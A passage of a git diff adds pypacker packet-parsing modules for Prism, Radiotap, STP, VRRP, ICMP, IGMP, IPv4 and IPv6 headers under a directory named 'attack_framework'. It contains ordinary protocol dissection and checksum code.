+PRISM_DID_RSSI		= 0x41400000
+
+
+class Did(pypacker.Packet):
+	__hdr__ = (
+		("id", "I", 0),
+		("status", "H", 0),
+		("len", "H", 0),
+		("value", "I", 0),
+	)
+
+	__byte_order__ = "<"
+
+
+class Prism(pypacker.Packet):
+	__hdr__ = (
+		("code", "I", 0),
+		("len", "I", 144),
+		("dev", "16s", b"\x00" * 16),
+		("dids", None, triggerlist.TriggerList),
+	)
+
+	def _dissect(self, buf):
+		off = 24
+		# assume 10 DIDs, 24 + 10*12 = 144 bytes prism header
+		end = off + 10 * 12
+
+		dids = []
+
+		while off < end:
+			did = Did(buf[off:off + 12])
+			dids.append(did)
+			off += 12
+
+		self.dids.extend(dids)
+		self._init_handler(PRISM_TYPE_80211, buf[off:])
+		return off
+
+
+# load handler
+from pypacker.layer12 import ieee80211
+
+pypacker.Packet.load_handler(Prism,
+	{
+		PRISM_TYPE_80211: ieee80211.IEEE80211
+	}
+)

+ 191 - 0
attack_framework/pypacker/layer12/radiotap.py

@@ -0,0 +1,191 @@
+"""Radiotap"""
+from pypacker import pypacker, triggerlist
+import struct
+import logging
+
+logger = logging.getLogger("pypacker")
+
+RTAP_TYPE_80211 = 0
+
+# Ref: http://www.radiotap.org
+# Fields Ref: http://www.radiotap.org/defined-fields/all
+
+# defined flags ordered by appearance (big endian)
+TSFT_MASK		= 0x01000000
+FLAGS_MASK		= 0x02000000
+RATE_MASK		= 0x04000000
+CHANNEL_MASK		= 0x08000000
+
+FHSS_MASK		= 0x10000000
+DB_ANT_SIG_MASK		= 0x20000000
+DB_ANT_NOISE_MASK	= 0x40000000
+LOCK_QUAL_MASK		= 0x80000000
+
+TX_ATTN_MASK		= 0x00010000
+DB_TX_ATTN_MASK		= 0x00020000
+DBM_TX_POWER_MASK	= 0x00040000
+ANTENNA_MASK		= 0x00080000
+
+ANT_SIG_MASK		= 0x00100000
+ANT_NOISE_MASK		= 0x00200000
+RX_FLAGS_MASK		= 0x00400000
+
+CHANNELPLUS_MASK	= 0x00000400
+HT_MASK			= 0x00000800
+
+AMPDU_MASK		= 0x00001000
+VHT_MASK		= 0x00002000
+
+# 7 bits reserved
+
+RT_NS_NEXT_MASK		= 0x00000020
+VENDOR_NS_NEXT		= 0x00000040
+EXT_MASK		= 0x00000080
+
+# mask -> (length, alignment)
+RADIO_FIELDS = {
+	TSFT_MASK		: (8, 8),
+	FLAGS_MASK		: (1, 1),
+	RATE_MASK		: (1, 1),
+	# channel + flags
+	CHANNEL_MASK		: (4, 2),
+
+	# fhss + pattern
+	FHSS_MASK		: (2, 1),
+	DB_ANT_SIG_MASK 	: (1, 1),
+	DB_ANT_NOISE_MASK	: (1, 1),
+	LOCK_QUAL_MASK 		: (2, 2),
+
+	TX_ATTN_MASK		: (2, 2),
+	DB_TX_ATTN_MASK 	: (2, 2),
+	DBM_TX_POWER_MASK 	: (1, 1),
+	ANTENNA_MASK		: (1, 1),
+
+	ANT_SIG_MASK 		: (1, 1),
+	ANT_NOISE_MASK		: (1, 1),
+	RX_FLAGS_MASK 		: (2, 2),
+
+	# CHANNELPLUS_MASK	:,
+	HT_MASK			: (3, 1),
+
+	AMPDU_MASK		: (8, 4),
+	VHT_MASK		: (12, 2)
+
+	# RT_NS_NEXT_MASK	:,
+	# VENDOR_NS_NEXT	:,
+	# EXT_MASK		:
+}
+
+RADIO_FIELDS_MASKS = [
+	TSFT_MASK,
+	FLAGS_MASK,
+	RATE_MASK,
+	# channel + flags
+	CHANNEL_MASK,
+
+	# fhss + pattern
+	FHSS_MASK,
+	DB_ANT_SIG_MASK,
+	DB_ANT_NOISE_MASK,
+	LOCK_QUAL_MASK,
+
+	TX_ATTN_MASK,
+	DB_TX_ATTN_MASK,
+	DBM_TX_POWER_MASK,
+	ANTENNA_MASK,
+
+	ANT_SIG_MASK,
+	ANT_NOISE_MASK,
+	RX_FLAGS_MASK,
+
+	HT_MASK,
+
+	AMPDU_MASK,
+	VHT_MASK
+]
+
+class FlagTriggerList(triggerlist.TriggerList):
+	# no __init__ needed: we just add tuples
+	def _pack(self):
+		return b"".join([flag[1] for flag in self])
+
+
+def get_channelinfo(channel_bytes):
+	"""
+	return -- [channel_mhz, channel_flags]
+	"""
+	return [struct.unpack("<H", channel_bytes[0:2])[0], struct.unpack("<H", channel_bytes[2:4])[0]]
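+
+# Example (sketch): channel info is little endian; 2.4 GHz channel 1 carries
+# frequency 2412 MHz, the flags value passes through unparsed.
+# get_channelinfo(struct.pack("<HH", 2412, 0x00a0))	# -> [2412, 0x00a0]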
+
+
+class Radiotap(pypacker.Packet):
+	__hdr__ = (
+		("version", "B", 0),
+		("pad", "B", 0),
+		("len", "H", 0x0800),
+		("present_flags", "I", 0),
+		("flags", None, FlagTriggerList)		# stores: (XXX_MASK, value)
+	)
+
+	# handle frame check sequence
+	def __get_fcs(self):
+		try:
+			return self._fcs
+		except AttributeError:
+			return b""
+
+	def __set_fcs(self, fcs):
+		self._fcs = fcs
+
+	fcs = property(__get_fcs, __set_fcs)
+
+	def _dissect(self, buf):
+		present_flags = struct.unpack(">I", buf[4:8])[0]
+		fcs_present = False
+		off = 8
+		flags = []
+
+		for mask in RADIO_FIELDS_MASKS:
+			if present_flags & mask == 0:
+				continue
+			size_align = RADIO_FIELDS[mask]
+			size = size_align[0]
+			# check alignment
+			mod = off % size_align[1]
+
+			if mod != 0:
+				# enlarge size by alignment
+				size += (size_align[1] - mod)
+
+			# logger.debug("got flag %02X, length/align: %r" % (mask, size_align))
+			# add all fields for the stated flag
+			value = buf[off: off + size]
+
+			# FCS present? (bit 0x10 in the 1-byte FLAGS field)
+			if mask == FLAGS_MASK and struct.unpack(">B", value[0:1])[0] & 0x10 != 0:
+				# logger.debug("fcs found")
+				fcs_present = True
+
+			# logger.debug("adding flag: %s" % str(mask))
+			flags.append((mask, value))
+			off += size
+
+		pos_end = len(buf)
+
+		if fcs_present:
+			self._fcs = buf[-4:]
+			pos_end = -4
+
+		self.flags.extend(flags)
+		self._init_handler(RTAP_TYPE_80211, buf[off: pos_end])
+		return off
+
+	def bin(self, update_auto_fields=True):
+		"""Custom bin(): handle FCS."""
+		return pypacker.Packet.bin(self, update_auto_fields=update_auto_fields) + self.fcs
+
+
+# load handler
+from pypacker.layer12 import ieee80211
+
+pypacker.Packet.load_handler(Radiotap,
+	{
+		RTAP_TYPE_80211: ieee80211.IEEE80211
+	}
+)
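+
+# Example (sketch): parsing a monitor-mode capture. present_flags decides
+# which (mask, value) tuples land in .flags, a trailing FCS in .fcs.
+# rt = Radiotap(raw_radiotap_bytes)	# raw_radiotap_bytes: assumed capture payload
+# ieee = rt[ieee80211.IEEE80211]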

+ 20 - 0
attack_framework/pypacker/layer12/stp.py

@@ -0,0 +1,20 @@
+"""Spanning Tree Protocol."""
+
+from pypacker import pypacker
+
+
+class STP(pypacker.Packet):
+	__hdr__ = (
+		("proto_id", "H", 0),
+		("v", "B", 0),
+		("type", "B", 0),
+		("flags", "B", 0),
+		("root_id", "8s", b""),
+		("root_path", "I", 0),
+		("bridge_id", "8s", b""),
+		("port_id", "H", 0),
+		("age", "H", 0),
+		("max_age", "H", 0),
+		("hello", "H", 0),
+		("fd", "H", 0)
+	)

+ 40 - 0
attack_framework/pypacker/layer12/vrrp.py

@@ -0,0 +1,40 @@
+"""Virtual Router Redundancy Protocol."""
+
+from pypacker import pypacker, checksum
+
+
+class VRRP(pypacker.Packet):
+	__hdr__ = (
+		("vtype", "B", 0x21),
+		("vrid", "B", 0),
+		("priority", "B", 0),
+		("count", "B", 0),
+		("atype", "B", 0),
+		("advtime", "B", 0),
+		("sum", "H", 0),
+	)
+
+	def __get_v(self):
+		return self.vtype >> 4
+
+	def __set_v(self, v):
+		self.vtype = (self.vtype & ~0xf) | (v << 4)
+	v = property(__get_v, __set_v)
+
+	def __get_type(self):
+		return self.vtype & 0xf
+
+	def __set_type(self, v):
+		self.vtype = (self.vtype & ~0xf0) | (v & 0xf)
+	type = property(__get_type, __set_type)
+
+	def bin(self, update_auto_fields=True):
+		if update_auto_fields:
+			if self._changed():
+				# logger.debug(">>> IP: calculating sum")
+				# reset checksum for recalculation,  mark as changed / clear cache
+				self.sum = 0
+				# logger.debug(">>> IP: bytes for sum: %s" % self.header_bytes)
+				self.sum = checksum.in_cksum(pypacker.Packet.bin())
+
+		return pypacker.Packet.bin(self, update_auto_fields=update_auto_fields)
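+
+# Example (sketch): sum is zeroed and recalculated over the packed packet
+# whenever a field changed.
+# vrrp = VRRP(vrid=1, priority=100)
+# raw = vrrp.bin()	# sum auto-filled via checksum.in_cksum()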

+ 0 - 0
attack_framework/pypacker/layer3/__init__.py


BIN
attack_framework/pypacker/layer3/__pycache__/__init__.cpython-33.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/__init__.cpython-34.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/esp.cpython-33.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/esp.cpython-34.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/icmp.cpython-33.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/icmp.cpython-34.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/icmp6.cpython-33.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/icmp6.cpython-34.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/igmp.cpython-33.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/igmp.cpython-34.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/ip.cpython-33.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/ip.cpython-34.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/ip6.cpython-33.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/ip6.cpython-34.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/ip_shared.cpython-33.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/ip_shared.cpython-34.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/ipx.cpython-33.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/ipx.cpython-34.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/ospf.cpython-33.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/ospf.cpython-34.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/pim.cpython-33.pyc


BIN
attack_framework/pypacker/layer3/__pycache__/pim.cpython-34.pyc


+ 10 - 0
attack_framework/pypacker/layer3/esp.py

@@ -0,0 +1,10 @@
+"""Encapsulated Security Protocol."""
+
+from pypacker import pypacker
+
+
+class ESP(pypacker.Packet):
+	__hdr__ = (
+		("spi", "I", 0),
+		("seq", "I", 0)
+	)

+ 127 - 0
attack_framework/pypacker/layer3/icmp.py

@@ -0,0 +1,127 @@
+"""Internet Control Message Protocol for IPv4."""
+
+from pypacker import pypacker, checksum
+
+import logging
+logger = logging.getLogger("pypacker")
+
+
+# Types (icmp_type) and codes (icmp_code) -
+# http://www.iana.org/assignments/icmp-parameters
+
+ICMP_CODE_NONE			= 0		# for types without codes
+ICMP_ECHOREPLY			= 0		# echo reply
+ICMP_UNREACH			= 3		# dest unreachable, codes:
+ICMP_UNREACH_NET		= 0		# bad net
+ICMP_UNREACH_HOST		= 1		# bad host
+ICMP_UNREACH_PROTO		= 2		# bad protocol
+ICMP_UNREACH_PORT		= 3		# bad port
+ICMP_UNREACH_NEEDFRAG		= 4		# IP_DF caused drop
+ICMP_UNREACH_SRCFAIL		= 5		# src route failed
+ICMP_UNREACH_NET_UNKNOWN	= 6		# unknown net
+ICMP_UNREACH_HOST_UNKNOWN	= 7		# unknown host
+ICMP_UNREACH_ISOLATED		= 8		# src host isolated
+ICMP_UNREACH_NET_PROHIB		= 9		# for crypto devs
+ICMP_UNREACH_HOST_PROHIB	= 10		# ditto
+ICMP_UNREACH_TOSNET		= 11		# bad tos for net
+ICMP_UNREACH_TOSHOST		= 12		# bad tos for host
+ICMP_UNREACH_FILTER_PROHIB	= 13		# prohibited access
+ICMP_UNREACH_HOST_PRECEDENCE	= 14		# precedence error
+ICMP_UNREACH_PRECEDENCE_CUTOFF	= 15		# precedence cutoff
+ICMP_SRCQUENCH			= 4		# packet lost, slow down
+ICMP_REDIRECT			= 5		# shorter route, codes:
+ICMP_REDIRECT_NET		= 0		# for network
+ICMP_REDIRECT_HOST		= 1		# for host
+ICMP_REDIRECT_TOSNET		= 2		# for tos and net
+ICMP_REDIRECT_TOSHOST		= 3		# for tos and host
+ICMP_ALTHOSTADDR		= 6		# alternate host address
+ICMP_ECHO			= 8		# echo service
+ICMP_RTRADVERT			= 9		# router advertise, codes:
+ICMP_RTRADVERT_NORMAL		= 0		# normal
+ICMP_RTRADVERT_NOROUTE_COMMON	= 16		# selective routing
+ICMP_RTRSOLICIT			= 10		# router solicitation
+ICMP_TIMEXCEED			= 11		# time exceeded, code:
+ICMP_TIMEXCEED_INTRANS		= 0		# ttl==0 in transit
+ICMP_TIMEXCEED_REASS		= 1		# ttl==0 in reass
+ICMP_PARAMPROB			= 12		# ip header bad
+ICMP_PARAMPROB_ERRATPTR		= 0		# error at param ptr
+ICMP_PARAMPROB_OPTABSENT	= 1		# req. opt. absent
+ICMP_PARAMPROB_LENGTH		= 2		# bad length
+ICMP_TSTAMP			= 13		# timestamp request
+ICMP_TSTAMPREPLY		= 14		# timestamp reply
+ICMP_INFO			= 15		# information request
+ICMP_INFOREPLY			= 16		# information reply
+ICMP_MASK			= 17		# address mask request
+ICMP_MASKREPLY			= 18		# address mask reply
+ICMP_TRACEROUTE			= 30		# traceroute
+ICMP_DATACONVERR		= 31		# data conversion error
+ICMP_MOBILE_REDIRECT		= 32		# mobile host redirect
+ICMP_IP6_WHEREAREYOU		= 33		# IPv6 where-are-you
+ICMP_IP6_IAMHERE		= 34		# IPv6 i-am-here
+ICMP_MOBILE_REG			= 35		# mobile registration req
+ICMP_MOBILE_REGREPLY		= 36		# mobile registration reply
+ICMP_DNS			= 37		# domain name request
+ICMP_DNSREPLY			= 38		# domain name reply
+ICMP_SKIP			= 39		# SKIP
+ICMP_PHOTURIS			= 40		# Photuris
+ICMP_PHOTURIS_UNKNOWN_INDEX	= 0		# unknown sec index
+ICMP_PHOTURIS_AUTH_FAILED	= 1		# auth failed
+ICMP_PHOTURIS_DECOMPRESS_FAILED	= 2		# decompress failed
+ICMP_PHOTURIS_DECRYPT_FAILED	= 3		# decrypt failed
+ICMP_PHOTURIS_NEED_AUTHN	= 4		# no authentication
+ICMP_PHOTURIS_NEED_AUTHZ	= 5		# no authorization
+ICMP_TYPE_MAX			= 40
+
+
+class ICMP(pypacker.Packet):
+	__hdr__ = (
+		("type", "B", ICMP_ECHO),
+		("code", "B", 0),
+		("sum", "H", 0)
+	)
+
+	def bin(self, update_auto_fields=True):
+		# logger.debug("sum is: %d" % self.sum)
+		if update_auto_fields and self._changed():
+			# logger.debug("sum is: %d" % self.sum)
+			self.sum = 0
+			self.sum = checksum.in_cksum(self._pack_header() + self.body_bytes)
+			# logger.debug("sum is: %d" % self.sum)
+		return pypacker.Packet.bin(self, update_auto_fields=update_auto_fields)
+
+	def _dissect(self, buf):
+		# logger.debug("ICMP: adding fields for type: %d" % buf[0])
+		self._init_handler(buf[0], buf[4:])
+		return 4
+
+	class Echo(pypacker.Packet):
+		__hdr__ = (
+			("id", "H", 0),
+			("seq", "H", 1),
+			("ts", "d", 0)
+		)
+
+	class Unreach(pypacker.Packet):
+		__hdr__ = (
+			("pad", "H", 0),
+			("mtu", "H", 0)
+		)
+
+	class Redirect(pypacker.Packet):
+		__hdr__ = (
+			("gw", "I", 0),
+			("seq", "H", 0)
+		)
+
+# load handler
+ICMP_TYPE_ECHO		= (0, 8)
+ICMP_TYPE_UNREACH	= 3
+ICMP_TYPE_REDIRECT	= 5
+
+pypacker.Packet.load_handler(ICMP,
+	{
+		ICMP_TYPE_ECHO: ICMP.Echo,
+		ICMP_TYPE_UNREACH: ICMP.Unreach,
+		ICMP_TYPE_REDIRECT: ICMP.Redirect
+	}
+)
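+
+# Example (sketch, assuming pypacker's "+"-concatenation of layers): building
+# an echo request; sum is recalculated in bin() once a field changed.
+# icmp_req = ICMP(type=ICMP_ECHO) + ICMP.Echo(id=1, seq=1)
+# raw = icmp_req.bin()	# sum gets filled in here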

+ 84 - 0
attack_framework/pypacker/layer3/icmp6.py

@@ -0,0 +1,84 @@
+"""Internet Control Message Protocol for IPv6."""
+
+from pypacker import pypacker
+
+import logging
+
+logger = logging.getLogger("pypacker")
+
+ICMP6_DST_UNREACH		= 1		# dest unreachable, codes:
+ICMP6_PACKET_TOO_BIG		= 2		# packet too big
+ICMP6_TIME_EXCEEDED		= 3		# time exceeded, code:
+ICMP6_PARAM_PROB		= 4		# ip6 header bad
+
+ICMP6_ECHO_REQUEST		= 128		# echo service
+ICMP6_ECHO_REPLY		= 129		# echo reply
+MLD_LISTENER_QUERY		= 130		# multicast listener query
+MLD_LISTENER_REPORT		= 131		# multicast listener report
+MLD_LISTENER_DONE		= 132		# multicast listener done
+
+# RFC2292 decls
+ICMP6_MEMBERSHIP_QUERY		= 130		# group membership query
+ICMP6_MEMBERSHIP_REPORT		= 131		# group membership report
+ICMP6_MEMBERSHIP_REDUCTION	= 132		# group membership termination
+
+ND_ROUTER_SOLICIT		= 133		# router solicitation
+ND_ROUTER_ADVERT		= 134		# router advertisement
+ND_NEIGHBOR_SOLICIT		= 135		# neighbor solicitation
+ND_NEIGHBOR_ADVERT		= 136		# neighbor advertisement
+ND_REDIRECT			= 137		# redirect
+
+ICMP6_ROUTER_RENUMBERING	= 138		# router renumbering
+
+ICMP6_WRUREQUEST		= 139		# who are you request
+ICMP6_WRUREPLY			= 140		# who are you reply
+ICMP6_FQDN_QUERY		= 139		# FQDN query
+ICMP6_FQDN_REPLY		= 140		# FQDN reply
+ICMP6_NI_QUERY			= 139		# node information request
+ICMP6_NI_REPLY			= 140		# node information reply
+
+ICMP6_MAXTYPE			= 201
+
+
+class ICMP6(pypacker.Packet):
+	__hdr__ = (
+		("type", "B", 0),
+		("code", "B", 0),
+		("sum", "H", 0)
+	)
+
+	def _dissect(self, buf):
+		self._init_handler(buf[0], buf[4:])
+		return 4
+
+	class Error(pypacker.Packet):
+		__hdr__ = (("pad", "I", 0), )
+
+	class Unreach(Error):
+		pass
+
+	class TooBig(Error):
+		__hdr__ = (("mtu", "I", 1232), )
+
+	class TimeExceed(Error):
+		pass
+
+	class ParamProb(Error):
+		__hdr__ = (("ptr", "I", 0), )
+
+	class Echo(pypacker.Packet):
+		__hdr__ = (
+			("id", "H", 0),
+			("seq", "H", 0)
+		)
+
+pypacker.Packet.load_handler(ICMP6,
+	{
+		1: ICMP6.Unreach,
+		2: ICMP6.TooBig,
+		3: ICMP6.TimeExceed,
+		4: ICMP6.ParamProb,
+		128: ICMP6.Echo,
+		129: ICMP6.Echo
+	}
+)

+ 18 - 0
attack_framework/pypacker/layer3/igmp.py

@@ -0,0 +1,18 @@
+"""Internet Group Management Protocol."""
+
+from pypacker import pypacker, checksum
+
+
+class IGMP(pypacker.Packet):
+	__hdr__ = (
+		("type", "B", 0),
+		("maxresp", "B", 0),
+		("sum", "H", 0),
+		("group", "I", 0)
+	)
+
+	def bin(self, update_auto_fields=True):
+		if update_auto_fields and self._changed():
+			self.sum = 0
+			self.sum = checksum.in_cksum(pypacker.Packet.bin(self))
+		return pypacker.Packet.bin(self, update_auto_fields=update_auto_fields)

+ 223 - 0
attack_framework/pypacker/layer3/ip.py

@@ -0,0 +1,223 @@
+"""
+Internet Protocol version 4.
+
+RFC 791
+"""
+
+from pypacker import pypacker, triggerlist, checksum
+from pypacker.layer3.ip_shared import *
+
+import logging
+
+logger = logging.getLogger("pypacker")
+
+# avoid references for performance reasons
+in_cksum = checksum.in_cksum
+
+# IP options
+# http://www.iana.org/assignments/ip-parameters/ip-parameters.xml
+IP_OPT_EOOL			= 0
+IP_OPT_NOP			= 1
+IP_OPT_SEC			= 2
+IP_OPT_LSR			= 3
+IP_OPT_TS			= 4
+IP_OPT_ESEC			= 5
+IP_OPT_CIPSO			= 6
+IP_OPT_RR			= 7
+IP_OPT_SID			= 8
+IP_OPT_SSR			= 9
+IP_OPT_ZSU			= 10
+IP_OPT_MTUP			= 11
+IP_OPT_MTUR			= 12
+IP_OPT_FINN			= 13
+IP_OPT_VISA			= 14
+IP_OPT_ENCODE			= 15
+IP_OPT_IMITD			= 16
+IP_OPT_EIP			= 17
+IP_OPT_TR			= 18
+IP_OPT_ADDEXT			= 19
+IP_OPT_RTRALT			= 20
+IP_OPT_SDB			= 21
+IP_OPT_UNASSIGNED		= 22
+IP_OPT_DPS			= 23
+IP_OPT_UMP			= 24
+IP_OPT_QS			= 25
+IP_OPT_EXP			= 30
+
+
+class IPOptSingle(pypacker.Packet):
+	__hdr__ = (
+		("type", "B", 0),
+	)
+
+
+class IPOptMulti(pypacker.Packet):
+	"""
+	len = total length (header + data)
+	"""
+	__hdr__ = (
+		("type", "B", 0),
+		("len", "B", 2),
+	)
+
+	def bin(self, update_auto_fields=True):
+		if update_auto_fields:
+			self.len = len(self)
+		return pypacker.Packet.bin(self, update_auto_fields=update_auto_fields)
+
+
+class IP(pypacker.Packet):
+	__hdr__ = (
+		("v_hl", "B", 69),		# = 0x45
+		("tos", "B", 0),
+		("len", "H", 20),
+		("id", "H", 0),
+		("off", "H", 0),
+		("ttl", "B", 64),
+		("p", "B", IP_PROTO_TCP),
+		("sum", "H", 0),
+		("src", "4s", b"\x00" * 4),
+		("dst", "4s", b"\x00" * 4),
+		("opts", None, triggerlist.TriggerList)
+	)
+
+	def __get_v(self):
+		return self.v_hl >> 4
+
+	def __set_v(self, value):
+		self.v_hl = (value << 4) | (self.v_hl & 0xf)
+	v = property(__get_v, __set_v)
+
+	def __get_hl(self):
+		return self.v_hl & 0x0f
+
+	def __set_hl(self, value):
+		self.v_hl = (self.v_hl & 0xf0) | value
+	hl = property(__get_hl, __set_hl)
+
+	# Convenient access for: src[_s], dst[_s]
+	src_s = pypacker.get_property_ip4("src")
+	dst_s = pypacker.get_property_ip4("dst")
+
+	def _dissect(self, buf):
+		total_header_length = ((buf[0] & 0xf) << 2)
+		options_length = total_header_length - 20		# total IHL - standard IP-len = options length
+
+		if options_length < 0:
+			# invalid header length: IHL claims less than the 20-byte standard header
+			raise Exception("invalid header length: %d" % options_length)
+		elif options_length > 0:
+			# logger.debug("got some IP options: %s" % tl_opts)
+			self._init_triggerlist("opts", buf[20: 20 + options_length], self.__parse_opts)
+
+		self._init_handler(buf[9], buf[total_header_length:])
+		return total_header_length
+
+	__IP_OPT_SINGLE = set([IP_OPT_EOOL, IP_OPT_NOP])
+
+	@staticmethod
+	def __parse_opts(buf):
+		"""Parse IP options and return them as List."""
+		optlist = []
+		i = 0
+		p = None
+
+		while i < len(buf):
+			# logger.debug("got IP-option type %s" % buf[i])
+			if buf[i] in IP.__IP_OPT_SINGLE:
+				p = IPOptSingle(type=buf[i])
+				i += 1
+			else:
+				olen = buf[i + 1]
+				# logger.debug("IPOptMulti")
+				p = IPOptMulti(type=buf[i], len=olen, body_bytes=buf[i + 2: i + olen])
+				# logger.debug("body bytes: %s" % buf[i + 2: i + olen])
+				i += olen		# typefield + lenfield + data-len
+				# logger.debug("IPOptMulti 2")
+			optlist.append(p)
+		return optlist
+
+	def bin(self, update_auto_fields=True):
+		if update_auto_fields:
+			if self._changed():
+				self.len = len(self)
+				# length changed so we have to recalculate the checksum:
+				# reset checksum for recalculation, mark as changed / clear cache
+				self.sum = 0
+				# update header length; NOTE: header needs to be a multiple of 4 bytes
+				self.hl = (self.hdr_len // 4) & 0xf
+				self.sum = in_cksum(self._pack_header())
+
+		return pypacker.Packet.bin(self, update_auto_fields=update_auto_fields)
+
+	def direction(self, other):
+		# logger.debug("checking direction: %s<->%s" % (self, next))
+		# TODO: handle broadcast
+		if self.src == other.src and self.dst == other.dst:
+			# consider packet to itself: can be DIR_REV
+			return pypacker.Packet.DIR_SAME | pypacker.Packet.DIR_REV
+		elif self.src == other.dst and self.dst == other.src:
+			return pypacker.Packet.DIR_REV
+		else:
+			return pypacker.Packet.DIR_UNKNOWN
+
+	def reverse_address(self):
+		self.src, self.dst = self.dst, self.src
+
+
+# Type of service (ip_tos), RFC 1349 ("obsoleted by RFC 2474")
+IP_TOS_DEFAULT			= 0x00			# default
+IP_TOS_LOWDELAY			= 0x10			# low delay
+IP_TOS_THROUGHPUT		= 0x08			# high throughput
+IP_TOS_RELIABILITY		= 0x04			# high reliability
+IP_TOS_LOWCOST			= 0x02			# low monetary cost - XXX
+IP_TOS_ECT			= 0x02			# ECN-capable transport
+IP_TOS_CE			= 0x01			# congestion experienced
+
+# IP precedence (high 3 bits of ip_tos), hopefully unused
+IP_TOS_PREC_ROUTINE		= 0x00
+IP_TOS_PREC_PRIORITY		= 0x20
+IP_TOS_PREC_IMMEDIATE		= 0x40
+IP_TOS_PREC_FLASH		= 0x60
+IP_TOS_PREC_FLASHOVERRIDE	= 0x80
+IP_TOS_PREC_CRITIC_ECP		= 0xa0
+IP_TOS_PREC_INTERNETCONTROL	= 0xc0
+IP_TOS_PREC_NETCONTROL		= 0xe0
+
+# Fragmentation flags (ip_off)
+IP_RF				= 0x8000		# reserved
+IP_DF				= 0x4000		# don't fragment
+IP_MF				= 0x2000		# more fragments (not last frag)
+IP_OFFMASK			= 0x1fff		# mask for fragment offset
+
+# Time-to-live (ip_ttl), seconds
+IP_TTL_DEFAULT			= 64			# default ttl, RFC 1122, RFC 1340
+IP_TTL_MAX			= 255			# maximum ttl
+
+# load handler
+from pypacker.layer3 import esp, icmp, igmp, ip6, ipx, ospf, pim
+from pypacker.layer4 import tcp, udp, sctp
+
+pypacker.Packet.load_handler(IP,
+	{
+		IP_PROTO_IP: IP,
+		IP_PROTO_ICMP: icmp.ICMP,
+		IP_PROTO_IGMP: igmp.IGMP,
+		IP_PROTO_TCP: tcp.TCP,
+		IP_PROTO_UDP: udp.UDP,
+		IP_PROTO_IP6: ip6.IP6,
+		IP_PROTO_ESP: esp.ESP,
+		IP_PROTO_PIM: pim.PIM,
+		IP_PROTO_IPXIP: ipx.IPX,
+		IP_PROTO_SCTP: sctp.SCTP,
+		IP_PROTO_OSPF: ospf.OSPF
+	}
+)
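+
+# Example (sketch): len, hl and sum are auto-updated on bin() when fields changed.
+# ip_pkt = IP(src_s="192.168.0.1", dst_s="192.168.0.2", p=IP_PROTO_UDP)
+# raw = ip_pkt.bin()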

+ 262 - 0
attack_framework/pypacker/layer3/ip6.py

@@ -0,0 +1,262 @@
+"""
+Internet Protocol version 6..for whoever needs it (:
+
+RFC 2460
+"""
+
+from pypacker import pypacker, triggerlist
+from pypacker.layer3.ip_shared import *
+
+import logging
+logger = logging.getLogger("pypacker")
+
+# TODO: to be implemented
+# Encapsulation Security Payload Header = 50
+# IP_PROTO_MOBILITY	= 135
+# IP_PROTO_NONEXT	= 59
+
+
+ext_hdrs = set([
+		IP_PROTO_HOPOPTS,
+		IP_PROTO_ROUTING,
+		IP_PROTO_FRAGMENT,
+		IP_PROTO_AH,
+		IP_PROTO_ESP,
+		IP_PROTO_DSTOPTS,
+		# TODO: to be implemented
+		# IP_PROTO_MOBILITY
+		# IP_PROTO_NONEXT
+	])
+
+
+class IP6(pypacker.Packet):
+	__hdr__ = (
+		("v_fc_flow", "I", 0x60000000),
+		("dlen", "H", 0),		# payload length (not including standard header)
+		("nxt", "B", 0),		# next header protocol
+		("hlim", "B", 0),		# hop limit
+		("src", "16s", b"\x00" * 16),
+		("dst", "16s", b"\x00" * 16),
+		("opts", None, triggerlist.TriggerList)
+	)
+
+	def __get_v(self):
+		return self.v_fc_flow >> 28
+
+	def __set_v(self, v):
+		self.v_fc_flow = (self.v_fc_flow & ~0xf0000000) | ((v & 0xf) << 28)
+	v = property(__get_v, __set_v)
+
+	def __get_fc(self):
+		return (self.v_fc_flow >> 20) & 0xff
+
+	def __set_fc(self, v):
+		self.v_fc_flow = (self.v_fc_flow & ~0xff00000) | ((v & 0xff) << 20)
+	fc = property(__get_fc, __set_fc)
+
+	def __get_flow(self):
+		return self.v_fc_flow & 0xfffff
+
+	def __set_flow(self, v):
+		self.v_fc_flow = (self.v_fc_flow & ~0xfffff) | (v & 0xfffff)
+	flow = property(__get_flow, __set_flow)
+
+	def _dissect(self, buf):
+		type_nxt = buf[6]
+		off = 40
+		opts = []
+
+		# logger.debug("parsing opts from bytes (dst: %s): (len: %d) %s" % (buf[24:40], self.hdr_len, buf[off:]))
+		# parse options until type is an upper layer one
+		while type_nxt in ext_hdrs:
+			if type_nxt == IP_PROTO_AH:
+				# AH states its length in 4-octet units, not counting the first 2 units
+				length = (buf[off + 1] + 2) * 4
+			else:
+				# other extension headers use 8-octet units, not counting the first 8 octets
+				length = 8 + buf[off + 1] * 8
+			# logger.debug("next type is: %s, len: %d, %r" % (type_nxt, length, buf[off:off + length]))
+			opt = ext_hdrs_cls[type_nxt](buf[off:off + length])
+			opts.append(opt)
+			type_nxt = buf[off]
+			off += length
+
+		# TODO: lazy dissect possible?
+		self.opts.extend(opts)
+		# IPv6 and IPv4 share same handler
+		self._init_handler(type_nxt, buf[off:])
+		# TODO: return length without parsing everything
+		return off
+
+	def direction(self, other):
+		# logger.debug("checking direction: %s<->%s" % (self, next))
+		if self.src == other.src and self.dst == other.dst:
+			# consider packet to itself: can be DIR_REV
+			return pypacker.Packet.DIR_SAME | pypacker.Packet.DIR_REV
+		elif self.src == other.dst and self.dst == other.src:
+			return pypacker.Packet.DIR_REV
+		else:
+			return pypacker.Packet.DIR_UNKNOWN
+
+	def reverse_address(self):
+		self.src, self.dst = self.dst, self.src
+
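The v/fc/flow properties pack into the single 32-bit v_fc_flow word, so writing them
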